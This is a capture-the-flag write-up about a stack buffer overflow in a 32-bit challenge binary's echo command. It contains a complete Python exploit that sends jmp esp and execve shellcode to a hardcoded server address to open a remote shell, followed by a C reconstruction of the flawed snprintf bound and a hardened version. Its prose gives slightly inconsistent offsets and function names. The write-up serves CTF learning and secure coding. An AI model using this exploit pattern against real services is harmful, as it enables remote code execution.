Exploitation 1 was a 32-bit ELF without NX protection. The vulnerability is a stack buffer overflow in the echo command, during the sprintf() call at 0x080489BF: snprintf() copies up to 8191 bytes of data supplied by read() into a 0x78-byte buffer, causing the overflow. Supplying 122 bytes along with echo: [6 bytes] overwrites the saved EIP. There is also a convenient jmp esp gadget to bypass ASLR. Below is the exploit:
#!/usr/bin/env python
import socket
import telnetlib
import struct

ip = "127.0.0.1"
ip = "54.163.248.69"
port = 9000

dup = '31c031db31c9b103fec9b03fb304cd8075f6'.decode('hex')
execve = '31c9f7e151682f2f7368682f62696e89e3b00bcd80'.decode('hex')
shellcode = dup + execve

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))
soc.recv(16)

jmp_esp = 0x080488b0

payload = "echo "
payload += "A" * 118
payload += struct.pack("<I", jmp_esp)
payload += shellcode
soc.send(payload + chr(0xa))

print "[*] Shell"
s = telnetlib.Telnet()
s.sock = soc
s.interact()

Flag for the challenge is aleph1-to-the-rescue++
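The bug pattern the writeup describes, reconstructed here as an added C example (not the challenge binary's source): an snprintf() bounded by the input limit rather than the destination size, beside the hardened form that bounds by the destination and reports truncation. BUF_LEN, MAX_INPUT, echo_vulnerable, echo_safe and safe_echo_len are names chosen for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>

#define BUF_LEN   0x78   /* 120-byte stack buffer, as stated in the writeup */
#define MAX_INPUT 8191   /* bound passed to snprintf(), as stated in the writeup */

/* Pattern described in the writeup (reconstructed, not the binary's source):
 * the size argument is the input limit, not the destination size, so
 * snprintf() gives no protection and a long line overwrites the saved EIP. */
void echo_vulnerable(const char *line)
{
    char buf[BUF_LEN];
    snprintf(buf, MAX_INPUT, "%s", line);   /* wrong bound: stack overflow */
    puts(buf);
}

/* Hardened form: bound by the destination and report truncation.
 * Returns true if the whole line fit, false if it was cut short. */
bool echo_safe(const char *line, char *out, size_t out_len)
{
    int n = snprintf(out, out_len, "%s", line);
    if (n < 0) {            /* encoding error: leave an empty string behind */
        out[0] = '\0';
        return false;
    }
    return (size_t)n < out_len;
}

/* Helper: push a constructed line of `len` 'A's (like the exploit's padding)
 * through echo_safe() into a BUF_LEN buffer and return the stored length. */
size_t safe_echo_len(size_t len, bool *fit)
{
    char *line = malloc(len + 1);
    memset(line, 'A', len);
    line[len] = '\0';
    char out[BUF_LEN];
    *fit = echo_safe(line, out, sizeof out);
    size_t stored = strlen(out);
    free(line);
    return stored;
}
```

With an 8191-byte line the safe version keeps 119 bytes plus the terminator and flags the truncation, where the original bound let the same input run past the 120-byte buffer.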